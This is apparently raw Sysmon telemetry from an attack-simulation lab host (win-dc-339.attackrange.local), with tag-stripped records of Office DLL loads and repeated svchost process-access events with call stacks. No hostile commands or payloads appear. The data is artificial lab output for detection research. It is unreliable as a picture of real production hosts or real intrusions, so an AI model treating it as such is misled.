Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFRHD.DLLMD5=F1CAB7B5AF9BA9DE71C7A9B635A94482,SHA256=E4F092D87AD56833D51C2F032E6655964B58B7AC0C21EB88C51F9E3789A25FDB,IMPHASH=4DB20AA205D194C459AC4F50CCF935CBtruetrue 23542300x800000000000000070212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OFFICEJS_EXCEL.DLLMD5=6978C693026384D293C967472307422C,SHA256=1E82806F19BF44EDF559EE07DDBF8F52BD0E95C410E99059608954C4ABEB0485,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000070211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000070202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OfficeJs_Core.DLLMD5=860C80E16834AB6AFE97C12154164C72,SHA256=317DF2FFDB988764BBDBE8E1530A2C015176DC71848F9CF3D167EC896E85BBED,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000070201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:33.314{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 